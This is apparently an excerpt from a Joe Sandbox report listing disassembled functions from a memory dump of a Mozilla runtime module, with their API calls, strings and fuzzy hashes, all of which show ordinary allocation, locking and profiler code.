Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: be9acec243ea5c64634913639cefa0e231774da17e7e081a975f1b29be30cee1
Instruction ID: da682e2ffb1bbcde66aff170ec9c03b663158b0436a4d2dd95277e08c591a840
Opcode Fuzzy Hash: be9acec243ea5c64634913639cefa0e231774da17e7e081a975f1b29be30cee1
Instruction Fuzzy Hash: FD21C4B1A042199FDB00CF69D88569A77F8EF84308F044039E91997341EB309A598F92

Function 6CCF76C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6CCF76F2
moz_xmalloc.MOZGLUE(00000001), ref: 6CCF7705

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CCF7717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6CCF778F,00000000,00000000,00000000,00000000), ref: 6CCF7731
free.MOZGLUE(00000000), ref: 6CCF7760

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 2538299546-0
Opcode ID: dc9cfd6ef5d593a04de8f8f9e484a565289aba8f8422e8291152124e8a4bfa5d
Instruction ID: c6689ff31503492bd00761589912809e326ef8a18a51f2bdec4203ff3194b8d5
Opcode Fuzzy Hash: dc9cfd6ef5d593a04de8f8f9e484a565289aba8f8422e8291152124e8a4bfa5d
Instruction Fuzzy Hash: 8C11C4B1D01215ABE710AFBA8C44BABBEE8EF45354F04442AF848E7700F771985087E2

Function 6CCD0D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6CC93DEF), ref: 6CCD0D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6CC93DEF), ref: 6CCD0D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6CC93DEF), ref: 6CCD0DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6CCD0D97, 6CCD0DBE
<jemalloc>, xrefs: 6CCD0D92, 6CCD0DB9

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 5f0e26b081e1c8bfbeefb324cdf7015f233f51488ac9a3dbe0b27d8fc7c105fd
Instruction ID: 6fc43ed9930614738910f68480e23830fa08de563bb13d886f63e5e881950027
Opcode Fuzzy Hash: 5f0e26b081e1c8bfbeefb324cdf7015f233f51488ac9a3dbe0b27d8fc7c105fd
Instruction Fuzzy Hash: D6F0B46139429436E624166E2C0AB5A669D77C2B25F218067F704DEEC0FB50F801C6A8

Function 6CCBD47B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

Part of subcall function 6CCCCBE8: GetCurrentProcess.KERNEL32(?,6CC931A7), ref: 6CCCCBF1
Part of subcall function 6CCCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC931A7), ref: 6CCCCBFA

EnterCriticalSection.KERNEL32(6CD1E784,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD4F2
LeaveCriticalSection.KERNEL32(6CD1E784,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD50B

Part of subcall function 6CC9CFE0: EnterCriticalSection.KERNEL32(6CD1E784), ref: 6CC9CFF6
Part of subcall function 6CC9CFE0: LeaveCriticalSection.KERNEL32(6CD1E784), ref: 6CC9D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD52E
EnterCriticalSection.KERNEL32(6CD1E7DC), ref: 6CCBD690
LeaveCriticalSection.KERNEL32(6CD1E784,?,?,?,?,?,?,?,00000000,76F92FE0,00000001,?,6CCCD1C5), ref: 6CCBD751

Strings

MOZ_CRASH(), xrefs: 6CCBD4BB

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 094b0cd1a2256d23f94680ce3c4691dde5d2163402d92ada281e257c3a85f2ac
Instruction ID: 6b808f0484d0a6c5b623736ec9a0cd961d279703b29d63a0abb6db76d250444c
Opcode Fuzzy Hash: 094b0cd1a2256d23f94680ce3c4691dde5d2163402d92ada281e257c3a85f2ac
Instruction Fuzzy Hash: CC51E3B1A087018FE314CF68C09475AB7F5EB89314F144A2ED59AD7F89E770E844CB82

Function 6CCE46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CCE4721

Part of subcall function 6CC94410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6CCD3EBD,00000017,?,00000000,?,6CCD3EBD,?,?,6CC942D2), ref: 6CC94444

Strings

-%llu, xrefs: 6CCE4733
., xrefs: 6CCE476A
profiler-paused, xrefs: 6CCE46E4

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: 9bfd7a0c7a757586b09a09c0341549ba55b79fe828ae9e14e591f51530849908
Instruction ID: cf1da77913cfb51154edbcac222f1433a38c6a1851b6e3084265957e0dbeeaa9
Opcode Fuzzy Hash: 9bfd7a0c7a757586b09a09c0341549ba55b79fe828ae9e14e591f51530849908
Instruction Fuzzy Hash: 60312671F042084BCB08CFADD89169EBBE6AB8D314F15813EE8059BB41FB749804CB90

Function 6CCEB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CC94290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CCD3EBD,6CCD3EBD,00000000), ref: 6CC942A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CCEB127), ref: 6CCEB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCEB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CCEB4E4

Strings

pid:, xrefs: 6CCEB4DE

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 39c6995542591007fe22b966f86a659de9c4677aebd1877d8597864a4df48599
Instruction ID: 5ab937477ea99e842c795b137a73200bf73e7cce7ad72973d6b2b22c5c1456ec
Opcode Fuzzy Hash: 39c6995542591007fe22b966f86a659de9c4677aebd1877d8597864a4df48599
Instruction Fuzzy Hash: A831F231A013089FDB01DFA9D890ABEB7B5BF4A318F540529E91167E41E731A849CBA1

Function 6CCDE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CCDE577
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDE584
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCDE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CCDE8A6

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6CCDE826, 6CCDE850
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6CCDE655
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6CCDE777
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6CCDE722, 6CCDE750, 6CCDE7A2
MOZ_PROFILER_STARTUP, xrefs: 6CCDE5A1, 6CCDE5CC, 6CCDE5FF, 6CCDE62A

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 23465b8815e11430b2eb52205649ede240b6626ff3645cf2fac4ff5b9610ba4b
Instruction ID: 75cf09bd40d663341864ef88f77632242ffd6e5098b6b36ceeb9d71416f13484
Opcode Fuzzy Hash: 23465b8815e11430b2eb52205649ede240b6626ff3645cf2fac4ff5b9610ba4b
Instruction Fuzzy Hash: B7118E31608354DFEB009F19C84AA59BBB8FB89368F41051DFA4647F50D774A846CB95

Function 6CCE0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CCE0CD5

Part of subcall function 6CCCF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CCCF9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CCE0D40
free.MOZGLUE ref: 6CCE0DCB

Part of subcall function 6CCB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CCB5EDB
Part of subcall function 6CCB5E90: memset.VCRUNTIME140(6CCF7765,000000E5,55CCCCCC), ref: 6CCB5F27
Part of subcall function 6CCB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CCB5FB2

free.MOZGLUE ref: 6CCE0DDD
free.MOZGLUE ref: 6CCE0DF2

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 743b1c7de14ea3fdd266df0cd72dc9f18f69f911e13676c1c87ef0d02f5db7c2
Instruction ID: f735ba4eb8e7ed1d27d68042bba47296e9f4e9a5d190b5c61b40300628a711f7
Opcode Fuzzy Hash: 743b1c7de14ea3fdd266df0cd72dc9f18f69f911e13676c1c87ef0d02f5db7c2
Instruction Fuzzy Hash: F1412971A187808BD720CF29C08179EFBE5BFC9754F518A2EE8D887750EB70A545CB92

Function 6CCECCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CCDDA31,00100000,?,?,00000000,?), ref: 6CCECDA4

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

Part of subcall function 6CCED130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CCECDBA,00100000,?,00000000,?,6CCDDA31,00100000,?,?,00000000,?), ref: 6CCED158
Part of subcall function 6CCED130: InitializeConditionVariable.KERNEL32(00000098,?,6CCECDBA,00100000,?,00000000,?,6CCDDA31,00100000,?,?,00000000,?), ref: 6CCED177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CCDDA31,00100000,?,?,00000000,?), ref: 6CCECDC4

Part of subcall function 6CCE7480: ReleaseSRWLockExclusive.KERNEL32(?,6CCF15FC,?,?,?,?,6CCF15FC,?), ref: 6CCE74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CCDDA31,00100000,?,?,00000000,?), ref: 6CCECECC

Part of subcall function 6CCACA10: mozalloc_abort.MOZGLUE(?), ref: 6CCACAA2

Part of subcall function 6CCDCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CCECEEA,?,?,?,?,00000000,?,6CCDDA31,00100000,?,?,00000000), ref: 6CCDCB57
Part of subcall function 6CCDCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CCDCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CCECEEA,?,?), ref: 6CCDCBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CCDDA31,00100000,?,?,00000000,?), ref: 6CCED058

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 8b809f61d7cf5189a93f65b0e38c47fbf3cd0f3f874c9b2b455c4f1f97a7e1fe
Instruction ID: 313f12aa41b29b96c8bcfe6df8bfa57437201cde4311f222b0e917b1e7cf8ce6
Opcode Fuzzy Hash: 8b809f61d7cf5189a93f65b0e38c47fbf3cd0f3f874c9b2b455c4f1f97a7e1fe
Instruction Fuzzy Hash: 4FD16F71A04B469FD708CF28C480B99F7E1BF89308F05866DD9598B752EB31E9A5CBC1

Function 6CCB5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6CCB5D40
EnterCriticalSection.KERNEL32(6CD1F688), ref: 6CCB5D67
__aulldiv.LIBCMT ref: 6CCB5DB4
LeaveCriticalSection.KERNEL32(6CD1F688), ref: 6CCB5DED

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 32650f4b037df722067a4d27a231d07828c72c3caa50cff45bfe4c5573d6b745
Instruction ID: 74a672f360cd66c61fc92143619656b62af2c4d7ae9ff7014affa7c47c238677
Opcode Fuzzy Hash: 32650f4b037df722067a4d27a231d07828c72c3caa50cff45bfe4c5573d6b745
Instruction Fuzzy Hash: F451B071F002298FDF08CFA8C955AAEBBB6FB89304F19865DC911B7B50D7316946CB80

Function 6CC9CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CC9CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CC9CF4E

Strings

0, xrefs: 6CC9CF30

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 8109f4f632025c56aa6bff12cb7e486ec520c229a7eb93f3c96e3651442aba65
Instruction ID: 9e985ee8d81275a4ab587febf1a2b7aa085c08e1c9037b09418848bf15162159
Opcode Fuzzy Hash: 8109f4f632025c56aa6bff12cb7e486ec520c229a7eb93f3c96e3651442aba65
Instruction Fuzzy Hash: B3510175A002568FCB00CF18C890AAABBB5FF99300F19859DD85A5F752E731ED06CBE0

Function 6CCD6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CCD82BC,?,?), ref: 6CCD649B

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCD64A9

Part of subcall function 6CCCFA80: GetCurrentThreadId.KERNEL32 ref: 6CCCFA8D
Part of subcall function 6CCCFA80: AcquireSRWLockExclusive.KERNEL32(6CD1F448), ref: 6CCCFA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCD653F
free.MOZGLUE(?), ref: 6CCD655A

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: c0b7f305f6589469ab18739722bfd969dffe9e245508067db3daebf69e8b9b8a
Instruction ID: 30bce6ceb19c44bb1662f57c628f98389d0c73a061f5fb6783bf8c574f3506d5
Opcode Fuzzy Hash: c0b7f305f6589469ab18739722bfd969dffe9e245508067db3daebf69e8b9b8a
Instruction Fuzzy Hash: C63170B5A047059FD704CF24D884A9BBBE4FF89314F00882EE95A97741EB34F919CB92

Function 6CCAB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CCAB4F5
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCAB502
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCAB542
free.MOZGLUE(?), ref: 6CCAB578

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: ff8936962e67ff00317a845d401d9e62a0c9559e478d2680e0d822d286d8fb69
Instruction ID: 33832ce096f7b5b12aa78b9f4e8631231251cf70cf484e95ca48a286af2936c1
Opcode Fuzzy Hash: ff8936962e67ff00317a845d401d9e62a0c9559e478d2680e0d822d286d8fb69
Instruction Fuzzy Hash: B911C030904B4AC7E3128FAAD418761B3B5FF96318F10570AE94953E01FBB0B1C68790

Function 6CCD3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CC9F20E,?), ref: 6CCD3DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CC9F20E,00000000,?), ref: 6CCD3DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CCD3E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CCD3E0E

Part of subcall function 6CCCCC00: GetCurrentProcess.KERNEL32(?,?,6CC931A7), ref: 6CCCCC0D
Part of subcall function 6CCCCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CC931A7), ref: 6CCCCC16

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 0daee1bfd92aa0d5a63a9a63eafc11ddf5dc61037ee1cf7e7a04d9aa8fae6017
Instruction ID: 576b4739f14d2498563c5875efecfdf67b127f4660b1cc07ebf374532bfa75dd
Opcode Fuzzy Hash: 0daee1bfd92aa0d5a63a9a63eafc11ddf5dc61037ee1cf7e7a04d9aa8fae6017
Instruction Fuzzy Hash: 2CF012B1A002087FE700AB54DC42DAB376DDB86624F050020FE0857B41E635BD2686F7

Function 6CCE85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CCE85D3

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CCE8725

Strings

map/set<T> too long, xrefs: 6CCE8720

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 8bb358f0421490ac932f3ad9fdfcea6acbf88a3c6954a5351cdafce8661e6149
Instruction ID: c70dfa46445ef996e2d7848785cbdf57227cc912709802a6f88d891282293430
Opcode Fuzzy Hash: 8bb358f0421490ac932f3ad9fdfcea6acbf88a3c6954a5351cdafce8661e6149
Instruction Fuzzy Hash: 8D5153B4A04641CFD701CF19C184A5ABBF1BF8A318F18C29AD8595BB62D375E885CF92

Function 6CC9BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6CC9BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC9BE8F

Strings

0, xrefs: 6CC9BE5B

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

